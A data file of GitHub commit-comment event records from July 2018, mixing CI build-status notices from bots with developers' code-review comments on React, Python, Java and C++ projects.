{"id":"7924953316","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29611770,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-05T18:49:22Z","updated_at":"2018-07-05T18:49:22Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 232](https://teamcity.otenv.com/viewLog.html?buildId=8870137&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) is now running\n"}},"created_at":"2018-07-05T18:49:22Z"}
{"id":"7924953337","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29611771,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-05T18:49:22Z","updated_at":"2018-07-05T18:49:22Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 232](https://teamcity.otenv.com/viewLog.html?buildId=8870137&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-05T18:49:22Z"}
{"id":"7924953810","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29611780,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-05T18:49:28Z","updated_at":"2018-07-05T18:49:28Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 196](https://teamcity.otenv.com/viewLog.html?buildId=8870018&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) is now running\n"}},"created_at":"2018-07-05T18:49:28Z"}
{"id":"7924953815","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29611781,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-05T18:49:29Z","updated_at":"2018-07-05T18:49:29Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 196](https://teamcity.otenv.com/viewLog.html?buildId=8870018&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:00"}},"created_at":"2018-07-05T18:49:29Z"}
{"id":"7924953895","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29611783,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-05T18:49:30Z","updated_at":"2018-07-05T18:49:30Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 197](https://teamcity.otenv.com/viewLog.html?buildId=8870144&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) is now running\n"}},"created_at":"2018-07-05T18:49:30Z"}
{"id":"7924953999","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29611785,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-05T18:49:31Z","updated_at":"2018-07-05T18:49:31Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 198](https://teamcity.otenv.com/viewLog.html?buildId=8870149&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) is now running\n"}},"created_at":"2018-07-05T18:49:31Z"}
{"id":"7924953919","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29611784,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-05T18:49:30Z","updated_at":"2018-07-05T18:49:30Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 197](https://teamcity.otenv.com/viewLog.html?buildId=8870144&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-05T18:49:30Z"}
{"id":"7924954124","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29611787,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-05T18:49:33Z","updated_at":"2018-07-05T18:49:33Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 199](https://teamcity.otenv.com/viewLog.html?buildId=8870152&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) is now running\n"}},"created_at":"2018-07-05T18:49:33Z"}
{"id":"7924954041","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29611786,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-05T18:49:32Z","updated_at":"2018-07-05T18:49:32Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 198](https://teamcity.otenv.com/viewLog.html?buildId=8870149&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-05T18:49:32Z"}
{"id":"7924954156","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29611788,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-05T18:49:34Z","updated_at":"2018-07-05T18:49:34Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 199](https://teamcity.otenv.com/viewLog.html?buildId=8870152&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-05T18:49:34Z"}
{"id":"7924955453","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29611819,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-05T18:49:52Z","updated_at":"2018-07-05T18:49:52Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 152](https://teamcity.otenv.com/viewLog.html?buildId=8869927&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) outcome was **SUCCESS**\nSummary: Tests passed: 15 Build time: 00:01:34"}},"created_at":"2018-07-05T18:49:52Z"}
{"id":"7924958498","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29611878,"position":null,"line":null,"path":null,"commit_id":"0c12da110f5784130e79940e8608d3dcef675c3c","created_at":"2018-07-05T18:50:30Z","updated_at":"2018-07-05T18:50:30Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#2395 "}},"created_at":"2018-07-05T18:50:30Z"}
{"id":"7924959151","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"iamnurs/recipes"},"payload":{"comment":{"id":29611890,"position":42,"line":42,"path":"components/detailsScreen/RecipeDetailsScreen.tsx","commit_id":"f4bc8213349f0839f159d449358badde0093ee62","created_at":"2018-07-05T18:50:40Z","updated_at":"2018-07-05T18:50:40Z","author_association":"NONE","body":"Используй `getParams(paramName)`.\r\nЕсли screen пушнут без параметров, `params` будет `undefined` и у тебя апп крашнется.\r\n\r\nhttps://reactnavigation.org/docs/en/params.html"}},"created_at":"2018-07-05T18:50:40Z"}
{"id":"7924959494","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29611893,"position":292,"line":292,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T18:50:44Z","updated_at":"2018-07-05T18:50:44Z","author_association":"NONE","body":"Should not be checking args this deep in the call stack, likely cleaner to split scrape and parse tasks, and at the top level check for the scrape arg and then don't call the top-level scrape function which would run through each dept"}},"created_at":"2018-07-05T18:50:44Z"}
{"id":"7924960800","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29611921,"position":null,"line":null,"path":null,"commit_id":"c2f5991090e640815cee73e3eb0ac1f893da7a56","created_at":"2018-07-05T18:51:01Z","updated_at":"2018-07-05T18:51:01Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#2395 "}},"created_at":"2018-07-05T18:51:01Z"}
{"id":"7924961601","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"iamnurs/recipes"},"payload":{"comment":{"id":29611940,"position":63,"line":63,"path":"components/detailsScreen/RecipeDetailsScreen.tsx","commit_id":"f4bc8213349f0839f159d449358badde0093ee62","created_at":"2018-07-05T18:51:11Z","updated_at":"2018-07-05T18:51:11Z","author_association":"NONE","body":"Опять нет `key`. Это ОБЯЗАТЕЛЬНЫЙ prop в реакте, когда мапишь компоненты."}},"created_at":"2018-07-05T18:51:11Z"}
{"id":"7924964320","type":"CommitCommentEvent","actor":{"login":"SergeyGladkikh24"},"repo":{"name":"SergeyGladkikh24/SergeyGladkikh24.github.io"},"payload":{"comment":{"id":29611993,"position":null,"line":null,"path":null,"commit_id":"da3862162e15d1a15c993386f868de154e199a25","created_at":"2018-07-05T18:51:47Z","updated_at":"2018-07-05T18:51:47Z","author_association":"OWNER","body":"initial"}},"created_at":"2018-07-05T18:51:47Z"}
{"id":"7924965081","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29612002,"position":4,"line":13,"path":"src/index.js","commit_id":"597aa1ab7337cd08f0bccb1019125f3f4b62ea87","created_at":"2018-07-05T18:51:57Z","updated_at":"2018-07-05T18:51:57Z","author_association":"COLLABORATOR","body":"It looks like your commit message here says: `checking in the parent component (checks everything)`. So it sounds like you're aware of the problem.\r\nLike I told you on Slack, you now have a data `modal`. Not only a string value. You also care for a `checked`. Every element in the list should be represented be 2 props: {value, checked}. This means that your list should be a list of {value, checked}."}},"created_at":"2018-07-05T18:51:57Z"}
{"id":"7924965343","type":"CommitCommentEvent","actor":{"login":"DBOTW"},"repo":{"name":"EtchedPixels/xtrs"},"payload":{"comment":{"id":29612010,"position":null,"line":null,"path":null,"commit_id":"a7d50bf85aea2077c80f8c8c9912d6eea18e6dac","created_at":"2018-07-05T18:52:00Z","updated_at":"2018-07-05T18:52:00Z","author_association":"NONE","body":"Not sure if this fix for LDIR/LDDR is correct: https://github.com/TimothyPMann/xtrs/pull/21 ... but tested and seems to work ..."}},"created_at":"2018-07-05T18:52:00Z"}
{"id":"7924966984","type":"CommitCommentEvent","actor":{"login":"cheshire"},"repo":{"name":"apple/swift-compiler-rt"},"payload":{"comment":{"id":29612029,"position":null,"line":null,"path":null,"commit_id":"4ca89b7a97fc9d9bd8ca00e7d7bfd114d85fc29c","created_at":"2018-07-05T18:52:21Z","updated_at":"2018-07-05T18:52:21Z","author_association":"MEMBER","body":"@futurejones We'll see what can be done. Problem is changes to swift-4.2-branch are extensively gated at this point in time. Probably the cleanest solution is to disable building libFuzzer and its tests on non-x86_64."}},"created_at":"2018-07-05T18:52:21Z"}
{"id":"7924967258","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29612034,"position":4,"line":13,"path":"src/index.js","commit_id":"597aa1ab7337cd08f0bccb1019125f3f4b62ea87","created_at":"2018-07-05T18:52:25Z","updated_at":"2018-07-05T18:52:25Z","author_association":"COLLABORATOR","body":"I will continue developing this logic in the rest of the comments."}},"created_at":"2018-07-05T18:52:25Z"}
{"id":"7924967984","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29612040,"position":295,"line":295,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T18:52:34Z","updated_at":"2018-07-05T18:52:34Z","author_association":"NONE","body":"Is there an index page that can be checked for the existence of these subpages? If the naming convention remains consistent going forward it might be acceptable to generate the sub page strings from 2014 to current year"}},"created_at":"2018-07-05T18:52:34Z"}
{"id":"7924968477","type":"CommitCommentEvent","actor":{"login":"Pikachu920"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29612044,"position":60,"line":60,"path":"src/main/java/ch/njol/skript/expressions/ExprIndexes.java","commit_id":"1c6c80eae6db0b00230385dfc4dd4a25180790c5","created_at":"2018-07-05T18:52:42Z","updated_at":"2018-07-05T18:52:42Z","author_association":"MEMBER","body":"i don't think so... if i have the list {l::*} and it's not set on init then the resulting map would be null even though it might be set at runtime, no? "}},"created_at":"2018-07-05T18:52:42Z"}
{"id":"7924968804","type":"CommitCommentEvent","actor":{"login":"garyskeete"},"repo":{"name":"garyskeete/linux-modder.github.io"},"payload":{"comment":{"id":29612053,"position":null,"line":null,"path":null,"commit_id":"3bb4a21ca161c61c68702d47bc5c236f7076681c","created_at":"2018-07-05T18:52:46Z","updated_at":"2018-07-05T18:52:46Z","author_association":"OWNER","body":"Teleporting and travelling self contained holograms"}},"created_at":"2018-07-05T18:52:46Z"}
{"id":"7924971760","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29612078,"position":null,"line":null,"path":null,"commit_id":"5b7e2c7b0f9b94eb47b20ad50ef6be95e9deb41c","created_at":"2018-07-05T18:53:25Z","updated_at":"2018-07-05T18:53:25Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loonc](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loonc).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loonc-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-05T18:53:25Z"}
{"id":"7924972995","type":"CommitCommentEvent","actor":{"login":"Rememberme1808"},"repo":{"name":"Rememberme1808/2048"},"payload":{"comment":{"id":29612082,"position":17,"line":21,"path":"js/game.js","commit_id":"d84be8dbe32eb2bc508439c49a3cefe2dd855a88","created_at":"2018-07-05T18:53:42Z","updated_at":"2018-07-05T18:53:42Z","author_association":"OWNER","body":"this.field = [];"}},"created_at":"2018-07-05T18:53:42Z"}
{"id":"7924974565","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29612089,"position":null,"line":null,"path":null,"commit_id":"68585482741441d2e0b244f8c7616fe87bbc55ee","created_at":"2018-07-05T18:54:03Z","updated_at":"2018-07-05T18:54:03Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-230](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-230).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-230-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-05T18:54:03Z"}
{"id":"7924975188","type":"CommitCommentEvent","actor":{"login":"gouletkfmx"},"repo":{"name":"Kerflummox-Capital-LLC/test-site"},"payload":{"comment":{"id":29612092,"position":null,"line":null,"path":null,"commit_id":"bca0f59ff91eb871881614b92aa6763cbb863f78","created_at":"2018-07-05T18:54:12Z","updated_at":"2018-07-05T18:54:12Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Test GitHub Integration with Org Account](https://trello.com/c/mjBIg2wp/40-test-github-integration-with-org-account)"}},"created_at":"2018-07-05T18:54:12Z"}
{"id":"7924975269","type":"CommitCommentEvent","actor":{"login":"gouletkfmx"},"repo":{"name":"Kerflummox-Capital-LLC/test-site"},"payload":{"comment":{"id":29612094,"position":null,"line":null,"path":null,"commit_id":"bca0f59ff91eb871881614b92aa6763cbb863f78","created_at":"2018-07-05T18:54:13Z","updated_at":"2018-07-05T18:54:13Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Test GitHub Integration with Org Account](https://trello.com/c/mjBIg2wp/40-test-github-integration-with-org-account)"}},"created_at":"2018-07-05T18:54:13Z"}
{"id":"7924975272","type":"CommitCommentEvent","actor":{"login":"gouletkfmx"},"repo":{"name":"Kerflummox-Capital-LLC/test-site"},"payload":{"comment":{"id":29612095,"position":null,"line":null,"path":null,"commit_id":"bca0f59ff91eb871881614b92aa6763cbb863f78","created_at":"2018-07-05T18:54:13Z","updated_at":"2018-07-05T18:54:13Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Test GitHub Integration with Org Account](https://trello.com/c/mjBIg2wp/40-test-github-integration-with-org-account)"}},"created_at":"2018-07-05T18:54:13Z"}
{"id":"7924975352","type":"CommitCommentEvent","actor":{"login":"gouletkfmx"},"repo":{"name":"Kerflummox-Capital-LLC/test-site"},"payload":{"comment":{"id":29612097,"position":null,"line":null,"path":null,"commit_id":"bca0f59ff91eb871881614b92aa6763cbb863f78","created_at":"2018-07-05T18:54:14Z","updated_at":"2018-07-05T18:54:14Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Test GitHub Integration with Org Account](https://trello.com/c/mjBIg2wp/40-test-github-integration-with-org-account)"}},"created_at":"2018-07-05T18:54:14Z"}
{"id":"7924975493","type":"CommitCommentEvent","actor":{"login":"gouletkfmx"},"repo":{"name":"Kerflummox-Capital-LLC/test-site"},"payload":{"comment":{"id":29612098,"position":null,"line":null,"path":null,"commit_id":"6914546cac931de235401dfdf56e928de61c9f06","created_at":"2018-07-05T18:54:15Z","updated_at":"2018-07-05T18:54:15Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Test GitHub Integration with Org Account](https://trello.com/c/mjBIg2wp/40-test-github-integration-with-org-account)"}},"created_at":"2018-07-05T18:54:15Z"}
{"id":"7924975745","type":"CommitCommentEvent","actor":{"login":"gouletkfmx"},"repo":{"name":"Kerflummox-Capital-LLC/test-site"},"payload":{"comment":{"id":29612099,"position":null,"line":null,"path":null,"commit_id":"6914546cac931de235401dfdf56e928de61c9f06","created_at":"2018-07-05T18:54:19Z","updated_at":"2018-07-05T18:54:19Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Test GitHub Integration with Org Account](https://trello.com/c/mjBIg2wp/40-test-github-integration-with-org-account)"}},"created_at":"2018-07-05T18:54:19Z"}
{"id":"7924976811","type":"CommitCommentEvent","actor":{"login":"gouletkfmx"},"repo":{"name":"Kerflummox-Capital-LLC/test-site"},"payload":{"comment":{"id":29612112,"position":null,"line":null,"path":null,"commit_id":"bca0f59ff91eb871881614b92aa6763cbb863f78","created_at":"2018-07-05T18:54:32Z","updated_at":"2018-07-05T18:54:32Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Test GitHub Integration with Org Account](https://trello.com/c/mjBIg2wp/40-test-github-integration-with-org-account)"}},"created_at":"2018-07-05T18:54:32Z"}
{"id":"7924979896","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29612121,"position":null,"line":null,"path":null,"commit_id":"974d0bc8292bedf1a7ac3263b2e5d48481a16bd3","created_at":"2018-07-05T18:55:13Z","updated_at":"2018-07-05T18:55:13Z","author_association":"NONE","body":"develop (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2306 of 2306 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-974d0bc8292bedf1a7ac3263b2e5d48481a16bd3-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-974d0bc8292bedf1a7ac3263b2e5d48481a16bd3-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-05T18:55:13Z"}
{"id":"7924980896","type":"CommitCommentEvent","actor":{"login":"iHiD"},"repo":{"name":"exercism/prototype"},"payload":{"comment":{"id":29612122,"position":null,"line":null,"path":null,"commit_id":"ff2e182bc8f8a29bf3d9ef38695351827a0537bb","created_at":"2018-07-05T18:55:25Z","updated_at":"2018-07-05T18:55:25Z","author_association":"CONTRIBUTOR","body":"@ccare @kntsoriano Could we add some test coverage to this pls?"}},"created_at":"2018-07-05T18:55:25Z"}
{"id":"7924981329","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29612125,"position":null,"line":null,"path":null,"commit_id":"5b02818fc71dbbd7ea9185a5fb854c531c427216","created_at":"2018-07-05T18:55:31Z","updated_at":"2018-07-05T18:55:31Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#aug-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#aug-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://aug-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-05T18:55:31Z"}
{"id":"7924983318","type":"CommitCommentEvent","actor":{"login":"dcwhite"},"repo":{"name":"SCIInstitute/SCIRun"},"payload":{"comment":{"id":29612128,"position":45,"line":383,"path":"src/Core/Algorithms/Visualization/OsprayDataAlgorithm.cc","commit_id":"0d2f250f67b7ce1fa0e049b14d854e27d784b4f4","created_at":"2018-07-05T18:55:56Z","updated_at":"2018-07-05T18:55:56Z","author_association":"MEMBER","body":"@jessdtate Here was the problem we saw last lunch--some meshes didn't have normals generated yet"}},"created_at":"2018-07-05T18:55:56Z"}
{"id":"7924983767","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":29612129,"position":null,"line":null,"path":null,"commit_id":"5b24ee8334d09ec08594b2a238b6138a005e2086","created_at":"2018-07-05T18:56:03Z","updated_at":"2018-07-05T18:56:03Z","author_association":"CONTRIBUTOR","body":"hilfreich zum Nachvollziehen wären ein paar unplausible MU-Nachrichten die eine Endlosschleife verursachen"}},"created_at":"2018-07-05T18:56:03Z"}
{"id":"7924985129","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29612133,"position":18,"line":47,"path":"src/index.js","commit_id":"597aa1ab7337cd08f0bccb1019125f3f4b62ea87","created_at":"2018-07-05T18:56:22Z","updated_at":"2018-07-05T18:56:22Z","author_association":"COLLABORATOR","body":"checkItem is a function that will require the index.\r\n```javascript\r\ncheckItem(index) {\r\n// find element at position index, call it previousItem\r\n// make new object called newItem with\r\n// newItem.value = previousItem.value\r\n// newItem.checked = !previousItem.checked\r\n// replace item at position `index` with newItem\r\n}```\r\nYou'll need to use a function called `list.splice` - I think."}},"created_at":"2018-07-05T18:56:22Z"}
{"id":"7924987062","type":"CommitCommentEvent","actor":{"login":"henrybojanowski"},"repo":{"name":"aliofye/Pintos"},"payload":{"comment":{"id":29612137,"position":null,"line":null,"path":null,"commit_id":"1a334fb2bb9b9832e0c6e0287ec8b6f6fe8658da","created_at":"2018-07-05T18:56:45Z","updated_at":"2018-07-05T18:56:45Z","author_association":"COLLABORATOR","body":"at this point in the process, fifo test for priority isn't working "}},"created_at":"2018-07-05T18:56:45Z"}
{"id":"7924988790","type":"CommitCommentEvent","actor":{"login":"Diogo-Esteves"},"repo":{"name":"Diogo-Esteves/my-first-blog"},"payload":{"comment":{"id":29612143,"position":null,"line":null,"path":null,"commit_id":"76f32c6272c888b9e3702bcf623da71b64b1e522","created_at":"2018-07-05T18:57:08Z","updated_at":"2018-07-05T18:57:08Z","author_association":"OWNER","body":"This is the first modifications on the website (for training)"}},"created_at":"2018-07-05T18:57:08Z"}
{"id":"7924989032","type":"CommitCommentEvent","actor":{"login":"darxriggs"},"repo":{"name":"jenkinsci/git-client-plugin"},"payload":{"comment":{"id":29612146,"position":71,"line":604,"path":"src/test/java/org/jenkinsci/plugins/gitclient/GitAPITestCase.java","commit_id":"637ae514811e381ab1b0294164594cce5849a7e1","created_at":"2018-07-05T18:57:11Z","updated_at":"2018-07-05T18:57:11Z","author_association":"NONE","body":"Thanks for the information. I am new to this plug-in. I don't understand your statement \"I'm not sure why the git version running on the CI job would matter\". Shouldn't some tests be dependent on the git installed on the system?\r\n\r\nI ran `mvn clean verify` on multiple systems (Ubuntu 16.04, 17.10, 18.04, Manjaro 17.1) with different git versions, Maven 3.5.x and Java 1.8. On all systems some tests are failing. Am I missing something?"}},"created_at":"2018-07-05T18:57:11Z"}
{"id":"7924990012","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29612148,"position":37,"line":66,"path":"src/index.js","commit_id":"597aa1ab7337cd08f0bccb1019125f3f4b62ea87","created_at":"2018-07-05T18:57:23Z","updated_at":"2018-07-05T18:57:23Z","author_association":"COLLABORATOR","body":"I would leave rendering the className to the child element `item`"}},"created_at":"2018-07-05T18:57:23Z"}
{"id":"7924993515","type":"CommitCommentEvent","actor":{"login":"paolakim-b"},"repo":{"name":"paolakim-b/GRID3-NGA"},"payload":{"comment":{"id":29612152,"position":null,"line":null,"path":null,"commit_id":"0f1034adfd9bf8bbdd5be6599c69b27aac839b96","created_at":"2018-07-05T18:58:12Z","updated_at":"2018-07-05T18:58:12Z","author_association":"OWNER","body":"Uploading Yanni's script"}},"created_at":"2018-07-05T18:58:12Z"}
{"id":"7924995095","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29612155,"position":39,"line":68,"path":"src/index.js","commit_id":"597aa1ab7337cd08f0bccb1019125f3f4b62ea87","created_at":"2018-07-05T18:58:32Z","updated_at":"2018-07-05T18:58:32Z","author_association":"COLLABORATOR","body":"You will need to loop through the list this way:\r\n```javascript\r\nlist.map( task => {\r\n<Item\r\n  value={task.value}\r\n  checked={task.checked}\r\n // other functions\r\n/>\r\n```"}},"created_at":"2018-07-05T18:58:32Z"}
{"id":"7924995322","type":"CommitCommentEvent","actor":{"login":"off99555"},"repo":{"name":"exodrifter/unity-python"},"payload":{"comment":{"id":29612156,"position":null,"line":null,"path":null,"commit_id":"f864edb51f2a4f8c5ae2cf77e2c28df540bd6f37","created_at":"2018-07-05T18:58:35Z","updated_at":"2018-07-05T18:58:35Z","author_association":"NONE","body":"What is the purpose of this file?\r\nDid you use it in the Example script?"}},"created_at":"2018-07-05T18:58:35Z"}
{"id":"7924997743","type":"CommitCommentEvent","actor":{"login":"YonatanKra"},"repo":{"name":"YonatanKra/cesium"},"payload":{"comment":{"id":29612164,"position":48,"line":237,"path":"Source/DataSources/Entity.js","commit_id":"bdd0cca966104ef464b021f3452a6ce68cbc547f","created_at":"2018-07-05T18:59:07Z","updated_at":"2018-07-05T18:59:07Z","author_association":"OWNER","body":"The default is `false`. This means, the default Cesium behavior (e.g. go over all of the entities).\r\nIt's up to the user, upon creating an `entity` to change its value.\r\nNotice the example in the article - in the loop that initiates the entities I set their `forceUpdate` property.\r\nIn the article look for this part:\r\n```\r\nentity.manualUpdate = true;\r\n   entity.forceUpdate = true;\r\n```\r\nInside the loop (in the solution section).\r\n\r\nHope this answers your question. Thanks for reading and bigger thanks for the feedback. If you have any more questions, let me know :)"}},"created_at":"2018-07-05T18:59:07Z"}
{"id":"7925002251","type":"CommitCommentEvent","actor":{"login":"Mr-Linus"},"repo":{"name":"Mr-Linus/shell-repo"},"payload":{"comment":{"id":29612172,"position":null,"line":null,"path":null,"commit_id":"bf07b5c4641a108e8e41678df04b11e5e7099fd3","created_at":"2018-07-05T19:00:04Z","updated_at":"2018-07-05T19:00:04Z","author_association":"OWNER","body":"add mesos"}},"created_at":"2018-07-05T19:00:04Z"}
{"id":"7925003960","type":"CommitCommentEvent","actor":{"login":"off99555"},"repo":{"name":"exodrifter/unity-python"},"payload":{"comment":{"id":29612183,"position":11,"line":11,"path":"Scripts/UnityPython.cs","commit_id":"f864edb51f2a4f8c5ae2cf77e2c28df540bd6f37","created_at":"2018-07-05T19:00:24Z","updated_at":"2018-07-05T19:00:24Z","author_association":"NONE","body":"Why do we need to load the assembly of GameObject and Editor?\r\nWhat does this line practically do?"}},"created_at":"2018-07-05T19:00:24Z"}
